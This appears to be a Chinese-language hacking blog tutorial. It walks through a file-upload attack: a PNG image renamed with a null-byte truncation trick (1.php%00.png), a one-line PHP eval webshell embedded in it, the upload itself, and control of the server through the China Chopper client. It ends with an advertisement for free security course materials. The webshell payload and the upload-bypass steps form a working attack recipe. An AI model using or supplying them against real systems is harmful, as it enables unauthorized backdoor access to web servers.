在kali的里面随机找一张png结尾的图片,然后重命名一下改成1.php%00.png。
改成这样的名字!!
然后用编辑器编辑一下!
在空白处写入一句话木马!!<%php @eval($_POST[pass]);?>
像这样:
然后保存!
打开burpsuit抓个包看看!!
可惜了,我们用了%00截断不需要改包!
这样就上传成功!!!
在菜刀地址上填上上路径!!再填上上密码!!!
就可以看见我的服务器里面的目录了,因为我的centos 7 所以罗!
然后我们进入我的服务器端看看!!
画红线的就是我们上传的木马!!!
学习资源分享
很多小伙伴想要一窥网络安全整个体系,这里我分享一份打磨了4年,已经成功修改到4.0版本的《平均薪资40w的网络安全工程师学习路线图》
一些其他平台白嫖不到的视频教程
网络安全超实用教程文档工具包
查漏补缺面试题库
常用工具一览表
以上学习路线附全套教程无偿分享,如有朋友需要扫码下方二维码免费获取,免费领取!